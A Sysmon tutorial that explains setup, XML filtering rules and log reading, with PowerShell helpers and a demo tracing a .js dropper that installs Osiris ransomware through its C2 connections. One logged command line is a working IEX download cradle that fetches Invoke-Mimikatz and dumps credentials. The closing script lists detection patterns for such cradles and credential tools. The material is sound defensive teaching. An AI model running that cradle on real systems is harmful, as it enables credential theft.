Sysmon - The Best Free Windows Monitoring Tool You Aren't Using

What is Sysmon?

There's nothing better than a free tool that does a job beautifully, and few tools fit that description better than Sysmon. Sysmon is part of the excellent Sysinternals suite from Mark Russinovich and is built on the same monitoring mechanisms that Process Monitor (ProcMon) uses. Unlike ProcMon, though, Sysmon is a Windows driver and service designed for continual, long-term, headless monitoring: it records the Windows events you choose to the Windows event log (the Microsoft-Windows-Sysmon/Operational channel). It's a tool we discuss extensively in SANS SEC511, and for good reason: it's an outstanding way to gain endpoint visibility and record the critical events that let you quickly reconstruct an intrusion timeline. It's non-intrusive, invisible to users, and when set up correctly causes no discernible performance impact. For all these reasons, I highly recommend you consider it for your standard enterprise build, and run it on your personal computers as well. It's so easy to set up and provides such high-value information that there's no reason not to install it.

When attackers get access to an endpoint, the incident response team's goal is to figure out what happened as quickly as possible so the response can be rapid and accurate. A correctly configured Sysmon install makes this far easier, because most of that information will already have been recorded and is immediately available for analysis. Here are some example use cases:

  • Log the file name, command-line arguments, and executable hashes of every process that starts, so unfamiliar binaries can be checked by hash
  • Log all modifications to the CurrentVersion\Run registry keys to identify when new autostart items are added
  • Log the time, date, hash, and signature details of every newly loaded driver
  • Log network connections on non-standard ports
  • Watch access to the lsass.exe process to catch process injection and credential dumping (password-dumping tools read LSASS memory)

Sound useful? Let's discuss how to set this up.

Where to get it

Sysmon is a free download from the Sysinternals site. At the time of writing, Sysmon v5 had just been released, adding file creation and registry modification logging. These events let us continuously monitor endpoints for critical changes such as new autostart entry points, hosts file changes, executables dropped in temp folders, and other intrusion-related changes.

Once you have Sysmon downloaded, installing it is as easy as c:\> sysmon64.exe -accepteula -i (sysmon.exe on 32-bit Windows; -accepteula skips the license prompt so the command also works from a build script), which installs the driver and service with default options. Specifically, the defaults turn on logging for process creation/termination, registry modifications, and driver loads; they do NOT turn on image load, process access, or network connection logging, because of the potential performance impact. You can see the configuration actually in effect at any time with sysmon64.exe -c and no other arguments. The defaults are useful and a great improvement over not having Sysmon, but fine-tuning the install to your environment is where the true power comes from, and to do that you will need to create a custom XML rule file.

Basic Configuration

You can quickly set up Sysmon to monitor selected events with switches on the command line:

  • -h [hash,...] = Specify which hash types to record. Use * for all, or for example -h SHA256 to turn on SHA256 only. Options are MD5, SHA1, SHA256, and IMPHASH.
  • -n [process,...] = Enable logging of network connections (potential performance hit). Optionally restrict it to specific processes with a comma-separated list of image names, for example -n firefox.exe,cmd.exe,powershell.exe
  • -l [process,...] = Enable logging of image load events (potential performance hit). Optionally restrict it to specific processes in the same way, for example -l iexplore.exe,calc.exe

Note: these switches are NOT additive. Each sysmon.exe -c call replaces the running configuration, so specify every option you want in a single command, for example sysmon.exe -c -n firefox.exe -h SHA1. Use sysmon.exe -c -- to revert to the defaults.
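As an added example (not from the original post), here is the install, update and verify cycle as you would script it for a headless build, using only the -accepteula, -i and -c switches described above. It assumes Sysmon64.exe and a rule file named sysmon.xml sit in C:\Tools\Sysmon; those paths, the service names, and the 1 GiB log size are my choices, not anything the post specifies.

```powershell
# Added example, not from the original post. Assumes Sysmon64.exe and a rule
# file (sysmon.xml, written as shown in the next section) live in
# C:\Tools\Sysmon. Run from an elevated PowerShell prompt.
$SysmonDir = 'C:\Tools\Sysmon'
$Sysmon    = Join-Path $SysmonDir 'Sysmon64.exe'   # use Sysmon.exe on 32-bit Windows
$Config    = Join-Path $SysmonDir 'sysmon.xml'

# First install. -accepteula suppresses the interactive EULA prompt so the
# command works in a build script; -i <file> installs with that rule file
# instead of the defaults.
& $Sysmon -accepteula -i $Config

# Later changes to the rule file: -c replaces the running configuration
# without reinstalling the driver (remember -c is not additive).
& $Sysmon -c $Config

# Dump the configuration the driver is actually using. Do this after every
# push to confirm the new rules really loaded.
& $Sysmon -c

# Post-deployment checks a practitioner wants:
# 1. service and driver are running (the service name follows the binary
#    name, so Sysmon64 here; the kernel driver is SysmonDrv and is not a
#    Win32 service, hence sc.exe rather than Get-Service for it)
Get-Service -Name Sysmon64 | Select-Object Name, Status, StartType
sc.exe query SysmonDrv

# 2. events are arriving in the Sysmon channel
Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' -MaxEvents 5 |
    Format-Table TimeCreated, Id, @{ n = 'Event'; e = { ($_.Message -split "`n")[0] } } -AutoSize

# 3. the channel is large enough to hold a useful retention window. The
#    default is small; 1 GiB is an assumed value, size it for your event rate.
wevtutil.exe sl Microsoft-Windows-Sysmon/Operational /ms:1073741824
```

The log-size step matters more than it looks: Sysmon writes into a fixed-size channel, so a noisy rule set on a default-sized log can push the events you need off the end within hours.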

Advanced Configuration

Advanced rules for Sysmon are written in an easy-to-read XML format, and I highly encourage you to configure Sysmon this way. A minimal skeleton for a Sysmon XML file looks like this (schemaversion 3.20 corresponds to Sysmon v5; sysmon -? config prints the version your installed binary supports):

<Sysmon schemaversion="3.20">
    <!-- Capture all hash types -->
    <HashAlgorithms>*</HashAlgorithms>
    <EventFiltering>
    ...conditions go here...
    </EventFiltering>
</Sysmon>

The conditions you specify control what will and will not be recorded. For each filter tag you list the conditions you are interested in and choose a directive: with onmatch="include", only events that match one of the conditions are logged and everything else is dropped; with onmatch="exclude", every event is logged except those that match. You are essentially building a whitelist or blacklist per event type. Conditions inside one tag are ORed, so a single match is enough, and all comparisons are case insensitive. For example, to log every driver load except those signed by exactly "Microsoft Windows" or whose signature contains the word "synaptics", use the DriverLoad filter tag with the Signature field, as shown below.

<DriverLoad onmatch="exclude">
    <Signature condition="is">Microsoft Windows</Signature>
    <Signature condition="contains">synaptics</Signature>
</DriverLoad>

A similar rule that logs only connections to port 80, to IP 1.2.3.4, or to the Kerberos port (any one match is enough) would look like this:

<NetworkConnect onmatch="include">
    <DestinationPort condition="is">80</DestinationPort>
    <DestinationIp condition="is">1.2.3.4</DestinationIp>
    <DestinationPortName condition="is">kerberos</DestinationPortName>
</NetworkConnect>

Pretty easy, right? The challenge lies mainly in knowing which event filter tags and conditions are available, and in crafting rules that are meaningful to your organization and incident response team. The available event filter tags (as of Sysmon v5) are listed below; notice DriverLoad and NetworkConnect from the previous examples.

ID  Tag                    Event
1   ProcessCreate          Process Create
2   FileCreateTime         File creation time
3   NetworkConnect         Network connection detected
5   ProcessTerminate       Process terminated
6   DriverLoad             Driver Loaded
7   ImageLoad              Image loaded
8   CreateRemoteThread     CreateRemoteThread detected
9   RawAccessRead          RawAccessRead detected
10  ProcessAccess          Process accessed
11  FileCreate             File created
12  RegistryEvent          Registry object added or deleted
13  RegistryEvent          Registry value set
14  RegistryEvent          Registry object renamed
15  FileCreateStreamHash   File stream created

There are a lot of options here, and each major version of Sysmon has brought additional filter tags to try out, so keep an eye out for upgrades. Note that new tags are only accepted when the schemaversion in your XML file is at least the version that introduced them (sysmon -? config prints the schema version your installed binary supports); a tag the declared schema does not know will cause the configuration to be rejected.

Conditions available for comparison are:

is          Default; values are equal.
is not      Values are different.
contains    The field contains this value.
excludes    The field does not contain this value.
begin with  The field begins with this value.
end with    The field ends with this value.
less than   Lexicographical comparison is less than zero.
more than   Lexicographical comparison is more than zero.
image       Match an image path (full path or only the image name).
            For example: lsass.exe will match c:\windows\system32\lsass.exe.

Example Configuration

An example basic configuration for Sysmon is listed below. It filters out some of the network traffic you are probably not interested in, and turns on recording for all file creation events. In reality you would want to limit registry and file-create recording to specific areas, since normal Windows use generates an immense amount of such activity; recording it all fills the log quickly and leaves you with only a short window of history when you need it, because Sysmon writes to a fixed-size event log channel and volume trades directly against retention.

<Sysmon schemaversion="3.20">
    <!-- Capture all hashes -->
    <HashAlgorithms>*</HashAlgorithms>
    <EventFiltering>   
        <!-- EventID == 1 Log all processes starting  -->
        <ProcessCreate onmatch="exclude" />

        <!-- EventID == 2 Do not log file creation time changes  -->
        <FileCreateTime onmatch="include" />

        <!-- EventID == 3 Log only selected network connections (careful - potential performance issues)  -->
        <NetworkConnect onmatch="exclude">
            <Image condition="contains">firefox.exe</Image>
            <DestinationIp condition="is">127.0.0.1</DestinationIp>
            <DestinationPortName condition="is">llmnr</DestinationPortName>
            <DestinationPortName condition="is">ldap</DestinationPortName>
            <DestinationPortName condition="is">kerberos</DestinationPortName>
        </NetworkConnect>

        <!-- EventID == 5 Log process termination -->
        <ProcessTerminate onmatch="exclude" />

        <!-- EventID == 6 Log all drivers loading except Microsoft and Windows signed ones-->
        <DriverLoad onmatch="exclude">
            <Signature condition="contains">microsoft</Signature>
            <Signature condition="contains">windows</Signature>
        </DriverLoad>

        <!-- EventID == 7 Do not log image loading (careful - potential performance issues) -->
        <ImageLoad onmatch="include" />

        <!-- EventID == 8 Only log remote thread creation for winlogon and lsass -->
        <CreateRemoteThread onmatch="include">
             <TargetImage condition="image">lsass.exe</TargetImage>
             <TargetImage condition="image">winlogon.exe</TargetImage>
        </CreateRemoteThread>

        <!-- EventID == 9 Do not log raw disk access (caused event flooding with certain disk encryption drivers)  -->
        <RawAccessRead onmatch="include" />

        <!-- EventID == 10 Do not log process access -->
        <ProcessAccess onmatch="include" />

        <!-- EventID == 11 Log all file creation -->
        <FileCreate onmatch="exclude" />

        <!-- EventID == 12-14 Do not log registry events (key add/delete, value set, rename) -->
        <RegistryEvent onmatch="include" />

        <!-- EventID == 15 Do not log file stream creation -->
        <FileCreateStreamHash onmatch="include" />
    </EventFiltering>
</Sysmon>
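As an added example (not from the original post), the configuration below is the kind of narrowing the paragraph before the example recommends: registry and file-create logging stay on, but only for the autostart locations, drop folders and file types an intruder typically touches, and ProcessAccess is switched on just for lsass.exe. It also turns the use cases from the opening list into concrete rules. Because Sysmon 5 ORs the conditions inside a tag, each line stands on its own. The paths, the extension list, and the C:\Tools\Sysmon location are my assumptions; the PowerShell wrapper simply writes the file and pushes it with -c.

```powershell
# Added example, not from the original post. Writes a narrower rule file and
# loads it. Every filter tag is listed explicitly so the result does not
# depend on Sysmon's per-event defaults.
$Rules = @'
<Sysmon schemaversion="3.20">
    <HashAlgorithms>*</HashAlgorithms>
    <EventFiltering>
        <!-- 1: every process start (an empty exclude list excludes nothing) -->
        <ProcessCreate onmatch="exclude" />
        <!-- 2: off -->
        <FileCreateTime onmatch="include" />
        <!-- 3: connections from scripting hosts and shells only, whatever the port -->
        <NetworkConnect onmatch="include">
            <Image condition="image">powershell.exe</Image>
            <Image condition="image">wscript.exe</Image>
            <Image condition="image">cscript.exe</Image>
            <Image condition="image">rundll32.exe</Image>
            <Image condition="image">regsvr32.exe</Image>
            <Image condition="image">mshta.exe</Image>
        </NetworkConnect>
        <ProcessTerminate onmatch="exclude" />
        <DriverLoad onmatch="exclude">
            <Signature condition="contains">microsoft</Signature>
            <Signature condition="contains">windows</Signature>
        </DriverLoad>
        <ImageLoad onmatch="include" />
        <CreateRemoteThread onmatch="include">
            <TargetImage condition="image">lsass.exe</TargetImage>
            <TargetImage condition="image">winlogon.exe</TargetImage>
        </CreateRemoteThread>
        <RawAccessRead onmatch="include" />
        <!-- 10: any process opening a handle to lsass.exe (credential dumpers) -->
        <ProcessAccess onmatch="include">
            <TargetImage condition="image">lsass.exe</TargetImage>
        </ProcessAccess>
        <!-- 11: drop folders, the Startup folder, the hosts file, and runnable
             types. Event 11 fires on create or overwrite, not on in-place edits. -->
        <FileCreate onmatch="include">
            <TargetFilename condition="contains">\AppData\Local\Temp\</TargetFilename>
            <TargetFilename condition="contains">\Start Menu\Programs\Startup\</TargetFilename>
            <TargetFilename condition="end with">\drivers\etc\hosts</TargetFilename>
            <TargetFilename condition="end with">.exe</TargetFilename>
            <TargetFilename condition="end with">.dll</TargetFilename>
            <TargetFilename condition="end with">.js</TargetFilename>
            <TargetFilename condition="end with">.ps1</TargetFilename>
        </FileCreate>
        <!-- 12-14: autostart entry points only. "\CurrentVersion\Run" also
             covers RunOnce because contains is a substring test. -->
        <RegistryEvent onmatch="include">
            <TargetObject condition="contains">\CurrentVersion\Run</TargetObject>
            <TargetObject condition="contains">\CurrentControlSet\Services\</TargetObject>
            <TargetObject condition="contains">\Image File Execution Options\</TargetObject>
            <TargetObject condition="contains">\Winlogon\</TargetObject>
        </RegistryEvent>
        <!-- 15: Zone.Identifier streams mark files that arrived from the internet -->
        <FileCreateStreamHash onmatch="include">
            <TargetFilename condition="contains">\Downloads\</TargetFilename>
        </FileCreateStreamHash>
    </EventFiltering>
</Sysmon>
'@

# Assumed install location; -c swaps the running configuration in place.
$Path = 'C:\Tools\Sysmon\sysmon.xml'
Set-Content -Path $Path -Value $Rules -Encoding ASCII
& 'C:\Tools\Sysmon\Sysmon64.exe' -c $Path
```

The design choice worth noting is the direction of each list: process starts and driver loads use exclude (log everything, carve out noise), while the high-volume file and registry events use include (log nothing unless it hits a location you care about). Run it for a week and review what the include lists missed before trusting it in an incident.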

Interpreting output

With this type of setup, here's an example of the Windows Sysmon log output you would get when a new process is created.

Process Create:
UtcTime: 2016-11-24 13:13:57.386
ProcessGuid: {e29500a3-e795-5836-0000-0010fa920f00}
ProcessId: 3764
Image: C:\Windows\System32\calc.exe
CommandLine: "C:\Windows\system32\calc.exe" 
CurrentDirectory: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\
User: WIN-4M6JEQRPH70\IEUser
LogonGuid: {e29500a3-e6ab-5836-0000-00207a590100}
LogonId: 0x1597a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=7BF8F58D8D8D5DEDCEE34185622A4B64702EFB8E,MD5=4884DA7754823B44CCC2B2106F21146E,SHA256=20F7530727FF461DE43AF16A42D60F12CD5C79A808E8DBEB8AB98159BD325ECE,IMPHASH=F93B5D76132F6E6068946EC238813CE1
ParentProcessGuid: {e29500a3-e6ab-5836-0000-0010857d0100}
ParentProcessId: 1352
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE

Some items to note

  • Every one of these fields can be used as a filter field in your XML rules, so you could restrict matches by Image, User, or IntegrityLevel, for example.
  • I've chosen to collect only the SHA1 hash here; you can record every type Sysmon supports by using * in the <HashAlgorithms> tag.
  • ProcessGuid is a globally unique identifier for this particular process, and every later event the process generates (network connections, files created, termination) carries the same value, so it is the key for correlating a process's activity (see the demo later on). LogonGuid does the same job for the logon session. Both are derived deterministically, which compensates for the fact that ProcessId and LogonId are reused over time and so are not unique.
  • PowerShell (admin required to read this log) is one of the easiest ways to view and filter these events. This shows all type 1 and 3 events (ProcessCreate and NetworkConnect) in a grid view:

    Get-WinEvent -FilterHashTable @{LogName="Microsoft-Windows-Sysmon/Operational";id=1,3} | Out-GridView

    -FilterXPath and -FilterHashTable narrow which events come back; to pull out individual fields such as Image or Hashes, index into each event's Properties collection. This command gives the list of unique process images that have made network connections (Properties[3] is the Image field of a v5 NetworkConnect event):

    get-winevent -LogName "Microsoft-Windows-Sysmon/Operational" -FilterXPath "*[System[Task=3]]" | %{$_.Properties[3].Value} | sort -Unique

  • If you forget a tag or condition name, sysmon.exe -? config prints the configuration help, including the current schema version and the available filter tags and fields.

Osiris Ransomware Demo

I pulled the spam attachment of the day (md5=260927aaae3470eab03b072d77268c60) from hybrid-analysis.com and ran it on a virtual machine with Sysmon enabled to show the power of this tool. This malware happens to be a .js file that drops the Osiris ransomware. I don't even really need to investigate what the virus did, because the Windows logs speak for themselves.

First, the initial execution of the malware from the desktop, which is typical since the file is designed to be double-clicked by a user after download.

Process Create:
UtcTime: 2016-12-11 15:58:06.435
ProcessGuid: {e29500a3-778e-584d-0000-0010fb549e00}
ProcessId: 2400
Image: C:\Windows\System32\wscript.exe
CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\Desktop\malware.js" 
CurrentDirectory: C:\Users\IEUser\Desktop\
User: WIN-4M6JEQRPH70\IEUser
LogonGuid: {e29500a3-e6ab-5836-0000-00207a590100}
LogonId: 0x1597a
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=860265276B29B42B8C4B077E5C651DEF9C81B6E9,MD5=D1AB72DB2BEDD2F255D35DA3DA0D4B16,SHA256=047F3C5A7AB0EA05F35B2CA8037BF62DD4228786D07707064DBD0D46569305D0,IMPHASH=62EA1D2DA2B1481E969D080A6B29D775
ParentProcessGuid: {e29500a3-e6ab-5836-0000-0010857d0100}
ParentProcessId: 1352
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: C:\Windows\Explorer.EXE

We can follow this through the logs by using the ProcessGuid of the process that started the malware:

PS C:\Windows\system32> get-winevent -filterhashtable @{logname="Microsoft-Windows-Sysmon/Operational"} -oldest | Where-Object {$_.message -like "*{e29500a3-778e-584d-0000-0010fb549e00}*"} | fl
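The search above works, but it has two gaps a practitioner hits immediately: matching the GUID inside the rendered Message text is slow and fragile, and, as the rundll32.exe child further down shows, every child process needs a second search. As an added example (not from the original post), the following functions read each event's fields by name from its XML and walk the ProcessGuid to ParentProcessGuid chain recursively, so the whole dropper-to-payload tree comes out as one timeline. The function names are mine; they rely only on the Get-WinEvent cmdlet and the Sysmon field names visible in the log excerpts on this page.

```powershell
# Added example, not from the original post. Reads Sysmon events into objects
# keyed by their EventData field names, then follows a ProcessGuid through the
# log and recurses into every child process it started.

function Get-SysmonEvents {
    # One object per event with TimeCreated, EventId and every EventData field
    # (ProcessGuid, Image, TargetFilename, DestinationHostname, ...) as a
    # property. Reading fields by name survives Sysmon versions that reorder
    # or add fields, unlike $_.Properties[n].
    param([int[]]$Id, [datetime]$After)
    $filter = @{ LogName = 'Microsoft-Windows-Sysmon/Operational' }
    if ($Id) { $filter['Id'] = $Id }
    if ($PSBoundParameters.ContainsKey('After')) { $filter['StartTime'] = $After }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $x   = [xml]$_.ToXml()
        $obj = [ordered]@{ TimeCreated = $_.TimeCreated; EventId = $_.Id }
        foreach ($d in $x.Event.EventData.Data) { $obj[$d.Name] = $d.'#text' }
        [pscustomobject]$obj
    }
}

function Get-SysmonProcessTree {
    # Everything the process with $ProcessGuid did (events 1, 3, 5, 11-15 carry
    # ProcessGuid; 8 and 10 carry SourceProcessGuid), then the same for each
    # child, found via the ParentProcessGuid of its own event 1.
    param(
        [Parameter(Mandatory)][string]$ProcessGuid,
        [datetime]$After = (Get-Date).AddDays(-1),
        [object[]]$Events,      # filled on the first call, reused on recursion
        [int]$Depth = 0
    )
    if (-not $Events) { $Events = @(Get-SysmonEvents -After $After) }
    # Sysmon brace-wraps GUIDs and their case differs between event types.
    $guid = $ProcessGuid.Trim('{}')

    $Events |
        Where-Object { (($_.ProcessGuid, $_.SourceProcessGuid) -replace '[{}]') -contains $guid } |
        Sort-Object TimeCreated |
        Select-Object @{ n = 'Depth'; e = { $Depth } }, *

    $children = $Events | Where-Object {
        $_.EventId -eq 1 -and $_.ParentProcessGuid -and $_.ParentProcessGuid.Trim('{}') -eq $guid
    }
    foreach ($child in $children) {
        Get-SysmonProcessTree -ProcessGuid $child.ProcessGuid -Events $Events -Depth ($Depth + 1)
    }
}

# Usage against the demo above: the wscript.exe dropper (depth 0) and its
# rundll32.exe child (depth 1) come back as one timeline.
Get-SysmonProcessTree -ProcessGuid '{e29500a3-778e-584d-0000-0010fb549e00}' -After '2016-12-11' |
    Format-Table Depth, TimeCreated, EventId, Image, TargetFilename, DestinationHostname, CommandLine -AutoSize
```

Pulling the event set once and recursing in memory is deliberate: on a busy host each Get-WinEvent call is the expensive part, and a ransomware tree can be dozens of processes deep.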

Some files are dropped in the Temp folder:

TimeCreated  : 12/11/2016 10:58:06 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:06.996
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\W8N
               S2AMB\o48qpgndy[1].txt
               CreationUtcTime: 2016-12-11 15:58:06.996

TimeCreated  : 12/11/2016 10:58:07 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:07.605
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Temp\GPt3ly2wE
               CreationUtcTime: 2016-12-11 15:58:07.605

A command and control domain is contacted via HTTP (vxhcf-31.srv.cat), probably to fetch the second-stage executable (GPt3ly2wE.zk), since .js attachments are typically just droppers:

TimeCreated  : 12/11/2016 10:58:07 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               UtcTime: 2016-11-25 06:00:48.931
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\wscript.exe
               User: WIN-4M6JEQRPH70\IEUser
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.87.141
               SourceHostname: WIN-4M6JEQRPH70.localdomain
               SourcePort: 49562
               SourcePortName: 
               DestinationIsIpv6: false
               DestinationIp: 134.0.11.154
               DestinationHostname: vxhcf-31.srv.cat
               DestinationPort: 80
               DestinationPortName: http

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:58:08.182
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\WScript.exe
               TargetFilename: C:\Users\IEUser\AppData\Local\Temp\GPt3ly2wE.zk
               CreationUtcTime: 2016-12-11 15:58:08.182

The file GPt3ly2wE.zk is run using rundll32.exe, which means it is probably the main encryption payload in DLL form (note that rundll32 is handed the path plus an export name, f7). We now follow the new ProcessGuid to get the full details of the child process.

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 1
Message      : Process Create:
               UtcTime: 2016-12-11 15:58:08.213
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               CommandLine: "C:\Windows\System32\rundll32.exe" C:\Users\IEUser\AppData\Local\Temp\GPT3LY~1.ZK,f7
               CurrentDirectory: C:\Users\IEUser\Desktop\
               User: WIN-4M6JEQRPH70\IEUser
               LogonGuid: {E29500A3-E6AB-5836-0000-00207A590100}
               LogonId: 0x1597a
               TerminalSessionId: 1
               IntegrityLevel: Medium
               Hashes: SHA1=8939CF35447B22DD2C6E6F443446ACC1BF986D58,MD5=51138BEEA3E2C21EC44D0932C71762A8,SHA256=5AD3C3
               7E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124,IMPHASH=EF8A44FE2F9AD4AB85E55004AAA024A9
               ParentProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ParentProcessId: 2400
               ParentImage: C:\Windows\System32\wscript.exe
               ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\IEUser\Desktop\malware.js" 

TimeCreated  : 12/11/2016 10:58:08 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 5
Message      : Process terminated:
               UtcTime: 2016-12-11 15:58:08.244
               ProcessGuid: {E29500A3-778E-584D-0000-0010FB549E00}
               ProcessId: 2400
               Image: C:\Windows\System32\wscript.exe

Using the same PowerShell Get-WinEvent search with the ProcessGuid {e29500a3-7790-584d-0000-001000679e00} shows further activity; here are some selected items:

A second command and control host is contacted (213.ip-51-254-141.eu), probably for the encryption key exchange:

TimeCreated  : 12/11/2016 10:58:13 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 3
Message      : Network connection detected:
               UtcTime: 2016-11-25 06:00:53.506
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               User: WIN-4M6JEQRPH70\IEUser
               Protocol: tcp
               Initiated: true
               SourceIsIpv6: false
               SourceIp: 192.168.87.141
               SourceHostname: WIN-4M6JEQRPH70.localdomain
               SourcePort: 49563
               SourcePortName: 
               DestinationIsIpv6: false
               DestinationIp: 51.254.141.213
               DestinationHostname: 213.ip-51-254-141.eu
               DestinationPort: 80
               DestinationPortName: http

The HTML ransom note ("you've been encrypted") is written to various places on disk, and then the process ends:

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.050
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\Users\IEUser\Desktop\OSIRIS-79f4.htm
               CreationUtcTime: 2016-12-11 15:59:11.050

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.050
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\ProgramData\Adobe\Updater6\4CR5T3SP--GUA7--EEHF--5050A725--CABDC0DA17C9.osiris
               CreationUtcTime: 2016-12-11 15:59:11.050

TimeCreated  : 12/11/2016 10:59:11 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 11
Message      : File created:
               UtcTime: 2016-12-11 15:59:11.253
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe
               TargetFilename: C:\Users\IEUser\Downloads\OSIRIS-5ade.htm
               CreationUtcTime: 2016-12-11 15:59:11.253

TimeCreated  : 12/11/2016 10:59:14 AM
ProviderName : Microsoft-Windows-Sysmon
Id           : 5
Message      : Process terminated:
               UtcTime: 2016-12-11 15:59:14.285
               ProcessGuid: {E29500A3-7790-584D-0000-001000679E00}
               ProcessId: 3380
               Image: C:\Windows\System32\rundll32.exe

Pretty easy to spot, right? Consider how much faster your incident response team would be with this type of info at their fingertips, and for free!

Mimikatz

Here's another quick scenario: what happens when you run something like Invoke-Mimikatz with the setup above? You get a complete command-line record of what was entered.

Process Create:
UtcTime: 2016-12-08 14:26:06.171
ProcessGuid: {6b166207-6d7e-5849-0000-0010fd880e00}
ProcessId: 3344
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell  "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
CurrentDirectory: c:\Users\IEUser\Downloads\Sysmon\
User: IE11WIN7\IEUser
LogonGuid: {6b166207-69e8-5849-0000-00201d710100}
LogonId: 0x1711d
TerminalSessionId: 1
IntegrityLevel: High
Hashes: SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D
ParentProcessGuid: {6b166207-69fe-5849-0000-0010d2ff0200}
ParentProcessId: 2680
ParentImage: C:\Windows\System32\cmd.exe
ParentCommandLine: "C:\Windows\system32\cmd.exe"

There you have it: some extremely valuable IOCs (the download URL, the full command line, the parent cmd.exe, and a High integrity level showing the shell was elevated), provided and recorded automatically by a basic Sysmon config!
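The command line above is textbook: a download cradle (New-Object Net.WebClient ... DownloadString) fed to IEX, from an elevated shell, through a URL shortener. As an added example (not from the original post), this function scores Sysmon event 1 records for exactly those traces, so a SIEM rule or a scheduled query can surface them without a human reading every command line. The two sample records are constructed here (the first is the page's own Mimikatz entry, the second a benign script run); the pattern list, weights and threshold are my choices to tune against your own baseline.

```powershell
# Added example, not from the original post. Scores Sysmon ProcessCreate
# (event 1) command lines for the traces a PowerShell download cradle leaves.
# Patterns, weights and the threshold are assumptions to tune against your
# own baseline, not anything Sysmon or the post defines.
$SuspiciousPatterns = @(
    @{ Name = 'download cradle';     Weight = 3; Regex = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b' }
    @{ Name = 'in-memory execution'; Weight = 2; Regex = '\bIEX\b|Invoke-Expression' }
    @{ Name = 'encoded command';     Weight = 3; Regex = '-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}' }
    @{ Name = 'credential tooling';  Weight = 4; Regex = 'mimikatz|DumpCreds|sekurlsa' }
    @{ Name = 'bypass or hidden';    Weight = 1; Regex = '-(ep|exec|executionpolicy)\s+bypass|-w(indowstyle)?\s+hidden|-nop\b' }
    @{ Name = 'url shortener';       Weight = 1; Regex = 'https?://(is\.gd|bit\.ly|tinyurl\.com|t\.co)/' }
)

function Test-SuspiciousCommandLine {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        [string]$IntegrityLevel = '',
        [int]$Threshold = 3
    )
    $hits  = @($SuspiciousPatterns | Where-Object { $CommandLine -imatch $_.Regex })
    $score = 0
    foreach ($h in $hits) { $score += $h.Weight }
    # An elevated shell (IntegrityLevel High) running a cradle is worse:
    # credential dumping needs it, as the Mimikatz record above shows.
    if ($score -gt 0 -and $IntegrityLevel -eq 'High') { $score += 1 }
    [pscustomobject]@{
        Suspicious  = ($score -ge $Threshold)
        Score       = $score
        Reasons     = (@($hits | ForEach-Object { $_.Name }) -join ', ')
        CommandLine = $CommandLine
    }
}

# Constructed sample records: the page's Mimikatz entry and a benign script run.
$Samples = @(
    [pscustomobject]@{
        IntegrityLevel = 'High'
        CommandLine    = 'powershell  "IEX (New-Object Net.WebClient).DownloadString(''http://is.gd/oeoFuI''); Invoke-Mimikatz -DumpCreds"'
    }
    [pscustomobject]@{
        IntegrityLevel = 'Medium'
        CommandLine    = 'powershell.exe -NoProfile -File C:\Scripts\Backup.ps1'
    }
)
$Samples |
    ForEach-Object { Test-SuspiciousCommandLine -CommandLine $_.CommandLine -IntegrityLevel $_.IntegrityLevel } |
    Format-Table Suspicious, Score, Reasons -AutoSize

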